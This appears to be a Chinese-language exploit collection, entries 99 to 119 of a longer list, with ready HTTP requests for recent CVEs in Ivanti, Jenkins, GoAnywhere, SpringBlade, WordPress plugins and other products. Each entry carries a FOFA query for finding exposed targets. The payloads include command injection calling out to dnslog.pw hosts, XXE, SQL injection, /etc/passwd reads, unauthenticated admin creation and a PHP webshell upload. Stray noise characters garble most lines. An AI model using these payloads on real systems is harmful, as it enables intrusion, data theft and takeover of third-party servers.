id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B. h# L6 ~5 K( Q7 T4 D5 r& f; K: {3 h: [
, W; C! Z: G+ c7 D% y5 z% v
o, _6 S3 T* [& o) v99. Ncast盈可视高清智能录播系统busiFacade RCE1 h1 v2 ^& f3 a: E$ P9 F: S# A
CVE-2024-0305+ E9 }. L' a, ~0 u4 e1 u- q
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
7 v4 T: K9 R/ \% \6 L3 U4 Q9 FPOST /classes/common/busiFacade.php HTTP/1.1$ V7 p" j7 M; W8 c) O/ Q* b
Host: 192.168.40.130:8080
" j* Z6 d6 E7 o5 VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 r9 o1 i( L- I5 t$ L f
Connection: close- q6 ^9 K0 Y$ {
Content-Length: 154
/ f6 ~5 {% @$ Q. c8 ?7 V) qAccept: */** m) v- \+ O% H) p
Accept-Encoding: gzip, deflate7 |5 a; d" \9 E! N$ ]/ G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" j7 ?5 @ A8 b) G
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
* [9 |, X5 h5 n0 WX-Requested-With: XMLHttpRequest
$ C. q. q& A z- a( |' Q+ S4 e
1 P7 i+ g2 m4 Q6 n%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D' L+ z( a! d/ ]* p/ `- R5 i' s" n
/ `# B, ~2 `5 P
- J3 }2 |; ]0 B \2 w! L. o
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
5 g! e0 H! B& I8 e( j# G p' L6 FCVE-2024-0352
1 r, i% K9 s& d* H* WFOFA:icon_hash="874152924"! N* E) U6 }! z
POST /api/file/formimage HTTP/1.1- N$ u( N$ u$ s1 k" L7 a. _
Host: 192.168.40.130- e$ J- {- Y3 F# ?* G) B- ?
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
: J5 @9 a* [. h. M7 T) `Connection: close4 G, R/ B& s3 C1 L
Content-Length: 201
5 U* G# f7 V5 M. c& P/ C* lContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
5 w6 F2 i; [6 E, ~. U+ ~9 t. RAccept-Encoding: gzip
% [) J, J2 [: [* H' I# a9 \1 \5 X% Q3 v: N3 M; T
------WebKitFormBoundarygcflwtei0 E3 F5 M6 U- ]; J- V. ^
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
' ?* r2 l! T+ ^* q; c" T+ O, GContent-Type: application/x-php
# _6 d6 [3 g; R M0 |0 D" \. l b) a+ M. n6 ]6 j* |5 E4 s! S& q
2ayyhRXiAsKXL8olvF5s4qqyI2O
4 I' E, x6 q0 }& d& V2 k6 m# c------WebKitFormBoundarygcflwtei--! \# y0 N& ^5 m d- C0 N" }% G
" T8 E, C H8 a3 v- K
. A: M X# N4 G% Z: K. Q101. ivanti policy secure-22.6命令注入
1 y8 J4 i- ?# x- VCVE-2024-21887
8 I" ~8 u( G% L5 U; HFOFA:body="welcome.cgi?p=logo"
8 S6 }2 [1 w- W# @1 \GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
/ r8 \8 y/ f" _" EHost: x.x.x.xx.x.x.x
, B4 Z! }+ K2 ^! N+ qUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36' ~( L% l- h3 T5 \7 D
Connection: close
* _" n# v+ I4 dAccept-Encoding: gzip
: `) i4 g1 u" G& V5 _( ~" R' I! n1 v% A I( \. \" f
/ c$ @0 s: z" P! ~. k6 |3 H: q3 m102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行9 W F- x1 v# I
CVE-2024-218939 [8 c5 t* V9 O) w- `' s2 k( n
FOFA:body="welcome.cgi?p=logo"/ ~ l( S& [1 x1 }9 `7 V
POST /dana-ws/saml20.ws HTTP/1.1
* n/ M0 N, f: M: C/ x* ^* g, W2 C, u2 VHost: x.x.x.x. v0 \: |; ^6 B) m/ g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 q2 @9 D" U6 ^3 o8 E7 {& \3 j
Connection: close
: J( T, {* u. k [- ~. e# T5 {" L; ]Content-Length: 792
5 n6 x/ f: l, l( x6 x$ [Accept-Encoding: gzip7 h9 N8 \ H) A$ P7 s
$ \5 U7 i1 R# ^5 M- l6 M& \<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
y3 f9 \1 @0 h9 W) N. N4 n
6 F: P1 f9 y7 U103. Ivanti Pulse Connect Secure VPN XXE- Z8 d# }% t& j u/ Z& L
CVE-2024-22024) O! |$ B9 [$ `+ z, L# [
FOFA:body="welcome.cgi?p=logo"
$ M3 ^1 V6 Y- v. iPOST /dana-na/auth/saml-sso.cgi HTTP/1.1
$ ]! V0 |2 e0 O# F, W1 NHost: 192.168.40.130:111: a/ v: M" }" \7 k
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.363 g7 n1 G& _2 o1 f
Connection: close7 G; a- G* l; v
Content-Length: 204
% a- a! B* z9 ~" \ m7 [# iContent-Type: application/x-www-form-urlencoded' ^/ H: y: y$ m, T4 ^& e
Accept-Encoding: gzip' E7 }6 O1 L( a1 `( H# X+ q4 q: s
7 \* r/ S2 A6 P6 Q& p. V5 ~
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
, V2 x* D) ^ M8 o- v0 R
* a" u9 F# B* ]7 ]
! Q; [- g! l% v其中SAMLRequest的值是xml文件内容的base64值,xml文件如下! L% A' s! I. {9 P4 h
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>3 T3 `8 o5 A1 [( W# W" v. T! U
) o- B Y$ z/ X* P, S) U) q; A* Y" \& E4 q& b3 S2 B! ]1 \
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露& d7 A) v. j" e. _8 w) z7 z
CVE-2024-0569
1 y9 U7 v. f* r( d( u( f- I6 ~FOFA:title="TOTOLINK"; @( L! U/ {5 [3 k# v$ K
POST /cgi-bin/cstecgi.cgi HTTP/1.1: H* y0 @7 O( D) z$ ?+ e
Host:192.168.0.1
- \* c8 b' G; pContent-Length:41
6 Q! K; L7 Z. T5 Y" V7 zAccept:application/json,text/javascript,*/*;q=0.01
, I$ ]( F% v! L6 Y6 ]1 L4 v) V% ]X-Requested-with: XMLHttpRequest7 d l0 @& O3 J* p
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36, t$ G6 r2 Y! e R4 A
Content-Type: application/x-www-form-urlencoded:charset=UTF-8/ a; K5 v" @1 J/ `: ~. p$ L' X1 ^
Origin: http://192.168.0.1
5 n# b9 v _. U( y7 [6 A0 jReferer: http://192.168.0.1/advance/index.html?time=1671152380564$ c& ]9 X/ @- c5 P. r5 i5 ~
Accept-Encoding:gzip,deflate/ q h) {7 |. f0 n5 N/ K
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.73 O1 W+ v1 z% G. @) d" n) G
Connection:close% ^2 _; z% _ @$ O
6 c- l' h ]) Y4 z/ T
{
/ A3 A* \$ E: D"topicurl":"getSysStatusCfg",
$ i( d* a/ \9 @# e% A( d"token":""
. ~% V: q/ c( n" R& c3 J}
" a# X. Z( q0 F; p
, M! s- t" V6 d; C105. SpringBlade v3.2.0 export-user SQL 注入
0 B0 g7 h1 @5 N) O7 k6 e' BFOFA:body="https://bladex.vip"
/ Q7 `2 I2 u: U% U* V+ D" yhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1, A4 f$ I4 K$ l1 [
2 j! e2 {; C7 k7 a106. SpringBlade dict-biz/list SQL 注入6 Y8 x; c. G7 `& {& d! l8 h
FOFA:body="Saber 将不能正常工作"
7 s% |8 O* {6 d7 x( z1 bGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1/ y7 ]4 V/ `2 K0 i
Host: your-ip% `9 b U% h% t0 m: v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
% h, D/ t# [+ B7 ?Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
3 J! `2 y: ~+ z/ e6 Q) U0 UAccept-Encoding: gzip, deflate/ s) ^6 Q7 x, d) p0 @/ \' b! [
Accept-Language: zh-CN,zh;q=0.9
: |2 N, Y. K" N" O# cConnection: close
, j$ E- ?& W- g$ F( O( Q8 z k2 U" u
0 i) T+ m! @' @6 W' k( e5 c- T0 }
: K2 n2 D" C/ r; L+ r107. SpringBlade tenant/list SQL 注入
& A! X1 Y: ?# t7 P* ?: HFOFA:body="https://bladex.vip"
7 L0 Z ~# u8 v; I0 a) @GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
X8 g2 G$ k( t5 {( r2 EHost: your-ip
7 j& L' E# p; T) N2 |2 uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
" P7 l7 j" O4 @3 i. W' lBlade-Auth:替换为自己的9 R# E/ V8 F5 B0 q0 s3 [5 y* U
Connection: close1 s' K, s8 t: t7 z; }/ Y
) H6 w4 O$ x4 n0 {) F# V
# U# W4 y, v6 P% q108. D-Tale 3.9.0 SSRF
8 U0 K9 ?( E, \1 QCVE-2024-21642
1 ?) s+ K: T! KFOFA:"dtale/static/images/favicon.png"
+ H4 F- [7 x3 u" J) p; g/ B2 r; [GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
8 Z, g7 F, F6 W2 J/ }8 g- }Host: your-ip- N7 p; ^$ r/ t# `) a; n
Accept: application/json, text/plain, */*
8 E" O/ q$ a* D4 }: _( }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36+ I4 D2 d/ M+ J$ [' P+ B1 x3 ^( W
Accept-Encoding: gzip, deflate
, t, p) N& b. d. NAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
1 I$ w$ O" `4 \Connection: close, P) J. u+ n# N) f; I5 {% e
0 x" k- h, z/ `/ ]$ v9 ^6 I
7 e, U) D: Z2 w: ~! i8 {7 l$ n* P109. Jenkins CLI 任意文件读取8 v7 a; d# y0 I2 a
CVE-2024-23897
" J6 w( z u# |" u8 [1 u; D+ EFOFA:header="X-Jenkins"
' @/ N9 Q( O* YPOST /cli?remoting=false HTTP/1.10 J+ `! m" X" z0 Z( c
Host:
4 D1 `" P6 G. B& _( V3 hContent-type: application/octet-stream
% d" e: s1 t1 W9 e8 E9 q& ySession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92+ w0 ]9 j/ p) `& p: [( ]
Side: upload3 _; w% I' u' R9 }
Connection: keep-alive
7 Z R' w$ s; T- @Content-Length: 1632 e3 D; ?3 _8 a7 }$ r2 j n7 n
0 e5 L, v1 L! g* J1 c
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'/ b" o# `; u, f* Y( d) W
( T1 f5 P5 t, W* ~5 d
, f% u' I0 e; ~6 A( _ pPOST /cli?remoting=false HTTP/1.1
5 a* }( q& o/ D* h) dHost:0 S! g3 j( e, O6 T4 `' i
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92) a* i1 d4 Q3 [
download, g8 L, W2 m6 Z9 b6 l% {5 o
Content-Type: application/x-www-form-urlencoded9 C3 \; A4 R8 s# H: o
Content-Length: 05 j' ^ Z! G; ^ b9 ^* s. P
5 x7 b; H1 S; [/ W0 v
4 G! |8 `/ i! A/ m' O7 y
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
. o3 x& D# a& z( rjava -jar jenkins-cli.jar help
( I [3 m1 ?9 m' x3 X[COMMAND]4 Q5 D8 G0 I% J# B2 v# ?1 b
Lists all the available commands or a detailed description of single command.
# r+ D0 [3 S/ m5 ]5 W/ H6 z COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
) i( `* x. e* K1 C6 W6 N* r
# T1 `" U( J Q, z# A4 b( a9 E6 P2 T" f- e+ \+ ?
110. Goanywhere MFT 未授权创建管理员
7 r4 b# _9 g1 o. uCVE-2024-0204, }. `; }" w6 h# x9 m9 w) B
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
; w+ f$ x# I. q/ r: s4 ]GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1 O2 }3 R) `' k4 e+ R
Host: 192.168.40.130:8000 }+ w. o) U9 O" J/ B* S+ h- D
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
8 o/ v8 H" F" j5 ~; r$ XConnection: close
5 V2 i7 {6 N( pAccept: */*
Z( x0 S0 }7 f; G& Y2 vAccept-Language: en; Q2 N& ^* }' T! B1 L, Q, ]1 }4 L
Accept-Encoding: gzip
+ n1 }$ d: F: a/ x- ^
! Q1 O( n) c' @0 S# k6 }! _
9 a7 X0 O8 ~( B5 j* K9 M111. WordPress Plugin HTML5 Video Player SQL注入
* p" N' I# N1 j VCVE-2024-1061* r) z% `9 X3 q2 G) ]
FOFA:"wordpress" && body="html5-video-player"
" E; x: M7 d! ^! c* TGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.10 A3 o8 \) [+ J4 M/ W# W% o
Host: 192.168.40.130:112
" l7 H" H/ q& A; h/ hUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
; H$ q8 J0 D1 T: u/ fConnection: close
- I" g4 l& e4 O$ z% Y# bAccept: */*# z7 L3 L% q0 B' c1 L- r
Accept-Language: en
5 H1 C( A) f" F) m) I/ gAccept-Encoding: gzip( x: |- r& l( C: z8 v. d- J U! V
/ o( Q; \' A/ w+ `
3 D; m- n: r5 W* }+ O& T" _- l( S8 S112. WordPress Plugin NotificationX SQL 注入
. K+ c" E: t- ?9 R. t/ @CVE-2024-16986 p8 Y* ~9 N% ~5 Q9 W) r
FOFA:body="/wp-content/plugins/notificationx"
/ M; ?) Q3 n- i8 I. n3 TPOST /wp-json/notificationx/v1/analytics HTTP/1.1
1 i. B- ]) L$ X1 {8 I0 J; w: M2 sHost: {{Hostname}}
/ _7 y* r: o8 K: k, h; b$ J/ @Content-Type: application/json
5 Y& \6 S- k" X* o/ ]- `7 l6 o( m" M- Y" @/ y# l+ o8 z
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}" J6 O6 c3 J1 A# p0 k0 d
9 _ K3 @9 l3 ^: s/ M5 p( W
2 `. ^ }0 s% `- x113. WordPress Automatic 插件任意文件下载和SSRF/ }. r" }: V& [, D
CVE-2024-27954
5 S3 w0 a% u. j: e1 H2 }) _FOFA:"/wp-content/plugins/wp-automatic"
' j% U1 ~1 Z2 h6 ^ dGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.11 ~2 {7 r0 Q, x
Host: x.x.x.x
o5 V/ y, f. j( _User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36" j2 Z) K4 w" P
Connection: close [ Q- E6 e3 n: z9 J
Accept: */*
9 {0 W0 A) Q+ k1 ?: MAccept-Language: en
& X) u( p; s3 X: V( F9 |4 X" b9 L' dAccept-Encoding: gzip9 r. @- c7 U- R: V
# d, u3 K# a. Z
) \+ S1 N/ D/ z/ D( C
114. WordPress MasterStudy LMS插件 SQL注入
. y: H7 m! d' Q+ I1 @FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"; Q6 N6 M8 Y0 l: N' g: `
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1* N8 x: [( ]8 A
Host: your-ip5 ~9 _5 \" C/ Q' Z3 P- J
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
K' l! E" C) R1 A& U+ BAccept-Charset: utf-8
6 H" T" I" w( M' c* p9 u( p1 rAccept-Encoding: gzip, deflate
0 m& w7 |1 n0 U8 o; ?! }Connection: close, S* w* I6 \! J& l$ V6 f( z; M6 \7 N3 t
5 ~- G) S. S: f3 F2 {
" r4 D) \4 U! h115. WordPress Bricks Builder <= 1.9.6 RCE
' K0 A* G1 k) HCVE-2024-25600
" i: f1 K6 @3 f# [8 ]' e- ?0 NFOFA: body="/wp-content/themes/bricks/"& t4 [0 I. A$ S# X/ X- w
第一步,获取网站的nonce值* F, G+ Q# f9 T) U" ]* R
GET / HTTP/1.1# Y1 t/ d6 V3 U& t- l
Host: x.x.x.x* ^( y) g5 C. M
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36$ p; a$ I* j9 p% t6 H: o) o* W* ^& z
Connection: close
6 y2 l a$ z7 U! }Accept-Encoding: gzip& v! w4 N' D, }5 {
0 z2 u4 N. z# X+ R4 b7 @9 ] X* o
1 q7 B M- g$ [, Z+ W第二步替换nonce值,执行命令; h$ Q' s0 A. O" a1 O
POST /wp-json/bricks/v1/render_element HTTP/1.1: l7 g4 S4 K; p
Host: x.x.x.x
* z- d2 M2 @+ a0 {2 j. SUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
" b+ r6 G9 {% i0 w5 G3 `: W$ g- zConnection: close) [, u2 u# k" d7 g& O7 a7 p! n
Content-Length: 356/ B" x' _2 G6 J0 b9 t* y
Content-Type: application/json
; \! G3 D M6 MAccept-Encoding: gzip
# [& |5 I* B; b- k/ l( F
( ?0 J9 `+ y% ?0 R- q F3 J! E{9 i9 i. b+ q" Z# b8 T
"postId": "1",
( N) q0 h2 ]" Q3 B "nonce": "第一步获得的值",/ w! c$ I% X3 L9 ] _# ~7 D
"element": {
" H4 U) L1 m% V) ?3 c "name": "container",2 A1 r+ B, R! M" W: u3 ~" J, m
"settings": {
; v* g8 K6 \$ x9 E0 C5 q "hasLoop": "true",; a0 Y8 L4 `% Y, D/ b# w
"query": {
3 h4 o& |. S1 ?3 M6 E- w6 }8 Y "useQueryEditor": true,- z# h3 ]* c {9 f3 c) z
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
$ R2 h, {) g8 k- L5 J6 J ? "objectType": "post"% `) D% H$ b2 P0 ]( n4 o Q
}% D- l& n0 a- U4 }
}
! i4 c7 I; p- k0 ^ }
) w0 i" v2 g" a* W}
5 |; D! [9 z2 r; K: j6 E
3 r! B, H& b! ?; X. S: |- m8 z$ t1 M8 Z, n! \2 ^5 Z/ r1 T1 n! D2 f% S
116. wordpress js-support-ticket文件上传 [4 w5 |9 ^& V8 r" v) O
FOFA:body="wp-content/plugins/js-support-ticket" \+ O. Y7 C0 W T
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
1 H; e; \8 X. m& B1 k$ ]Host:
. m6 B+ a6 s5 _9 N" pContent-Type: multipart/form-data; boundary=--------7670991710 _, J/ ]. v4 B/ L3 X9 j0 Q& ?
User-Agent: Mozilla/5.0
1 x9 T8 i2 L2 V L- i8 `6 N; `5 ~8 g
----------767099171& j I" L0 W2 f2 W8 j
Content-Disposition: form-data; name="action"/ ?2 N6 k( A: A, X* P' K! s$ y g
configuration_saveconfiguration" F+ u5 o& U! `5 l1 F7 ~. E0 N
----------767099171
$ U# ~ Z: n* G8 P. KContent-Disposition: form-data; name="form_request"% W6 _+ c/ ^: q: F. n
jssupportticket! Z9 ]/ a- G& T9 n
----------767099171
+ j' X. t; x k* ]0 {0 _. CContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"$ J- _# P4 ~2 x! w( b; s0 l
Content-Type: image/png
1 D- X& T" y% ?" {4 m, T' H----------767099171--
3 a# }/ _0 [ y6 E# ]( ] a5 `; i$ p% L7 t
+ H( `) S- [" d1 O- M. G
117. WordPress LayerSlider插件SQL注入$ l+ f r# l- T' y9 n& D: P
version:7.9.11 – 7.10.0
# w! c+ k$ |! F$ u' ^5 h) DFOFA:body="/wp-content/plugins/LayerSlider/"( I3 E! k4 W" u" Q0 K9 _* x
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.19 [ U- y# o" D. N9 k- _
Host: your-ip/ {* E; U% ~3 W8 {, M+ O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
+ K# C# [; C% bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& [, r! O; M( u+ }; k& v8 OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. [( q" i- I" f" g
Accept-Encoding: gzip, deflate, br" ^, t" S. Y8 a" l/ `
Connection: close
% _% E. F* h, C# [) iUpgrade-Insecure-Requests: 1- X& `: L4 k7 K) H. m- ?; w; R/ Z
5 K, s4 `" `) z* H' {. F
6 v8 Y7 c0 ^2 f' R118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
4 p5 V/ h: S6 n2 G3 V" p# s- KCVE-2024-0939
/ [5 O S; y* r& M% e( ]# W! i6 PFOFA:title="Smart管理平台"
5 U& m2 e* o% V+ \9 v! wPOST /Tool/uploadfile.php? HTTP/1.15 ]( F' I( M5 w3 N: j+ Z7 w e
Host: 192.168.40.130:8443+ t$ K/ v' k+ T i1 {2 a- i7 p
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
+ ]6 ?1 N: t7 j! t$ n/ G6 oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0, E* C; l2 z, Y, p. ~' E; d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 |, @5 T7 V4 t. s* CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 }9 N" J6 Q6 bAccept-Encoding: gzip, deflate
/ A0 ]+ B: `) d1 n# g, aContent-Type: multipart/form-data; boundary=---------------------------139797012227476466340371828879 \7 y' B6 x: d+ _1 P
Content-Length: 405* ~; y: |% G0 F6 B1 `
Origin: https://192.168.40.130:8443
9 l! | X2 D* j1 C3 {. N6 NReferer: https://192.168.40.130:8443/Tool/uploadfile.php
3 _/ `3 f3 H& L3 {* qUpgrade-Insecure-Requests: 1, a' `& I6 y! G9 _6 G4 I$ i
Sec-Fetch-Dest: document: ~" y+ U$ X6 ]9 v3 {0 q6 T8 C
Sec-Fetch-Mode: navigate
! ~3 f3 @9 {. H# t- S- T! pSec-Fetch-Site: same-origin$ l* j6 L; `6 m: x, D
Sec-Fetch-User: ?1
: l. ~6 e7 N" T7 tTe: trailers3 U& _9 o( W+ G$ L* C: U6 d
Connection: close6 o2 \3 u4 J! ]7 ~5 P+ M7 h
# R8 T, j: E1 E+ ]4 {, e6 ?
-----------------------------13979701222747646634037182887! `5 d2 N+ U' T& X1 p3 F D$ p
Content-Disposition: form-data; name="file_upload"; filename="contents.php"% V- ?2 A% @& ^, |$ e) T
Content-Type: application/octet-stream
n* W7 q3 q. {7 |3 ~8 Q: Q3 ]7 P' z
<?php3 R; A7 S2 O; r; Q) j- R
system($_POST["passwd"]);& @6 L5 y. q, l, f5 c
?>: S% `% Y' m3 g6 g9 y
-----------------------------13979701222747646634037182887
5 o. X4 g: _) h1 p* e* a* ^Content-Disposition: form-data; name="txt_path": q n f$ M- \# W/ t' p6 |
- r' L' i; j& k: _- B3 P9 a, i
/home/src.php# @ [3 v* T5 j. ?3 U7 W( ?
-----------------------------13979701222747646634037182887--: c8 Z7 K- [9 P, n B3 V( d2 V
5 E# k' n( z8 a9 ^$ c5 \$ a
) \ o1 T. c; \* S+ E4 s4 t/ b
访问/home/src.php
' v' z3 q* Y* _2 Z1 ?- Q$ [6 H7 B- _ T& C: S3 m, c' L s0 q
119. 北京百绰智能S20后台sysmanageajax.php sql注入
# k6 k, R5 C/ {$ {CVE-2024-1254
6 g& g( z& A$ c+ G6 @FOFA:title="Smart管理平台"
( I# M( D3 `. }6 T先登录进入系统,默认账号密码为admin/admin
6 e+ _0 O/ ~, H5 h6 j0 |0 _POST /sysmanage/sysmanageajax.php HTTP/1.11
$ q7 w" s" K" q ^* O! gHost: x.x.x.x/ p# p6 c V: G. v2 c8 ?, D
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee$ |' R3 C1 h: N+ |& f7 S* {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
& B) J( l2 p) D6 O5 p4 o! p! R! q3 [Accept: */* c9 q) E7 S) r% ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% U, d3 ^$ W, }' F: u) [Accept-Encoding: gzip, deflate3 f* P* P/ \- p. S( @
Content-Type: application/x-www-form-urlencoded;
5 U6 L1 _; T) V5 h2 BContent-Length: 109" F6 V! T' z# N. D, M1 w
Origin: https://58.18.133.60:84438 g% q D" Q2 C* c; p- s
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
. A. Y% v7 T' ]: i2 bSec-Fetch-Dest: empty
- G w& h+ W. @, [Sec-Fetch-Mode: cors+ l6 H8 x, A% g: c0 D/ T
Sec-Fetch-Site: same-origin, P: o% Y- f/ V/ m
X-Forwarded-For: 1.1.1.1
/ L+ z7 X5 D" N7 ^. [X-Originating-Ip: 1.1.1.1
3 P& ` }) x' ^' @X-Remote-Ip: 1.1.1.1
+ C# J' c# F l+ w3 ~7 BX-Remote-Addr: 1.1.1.1' }4 F9 G! j/ o) N
Te: trailers
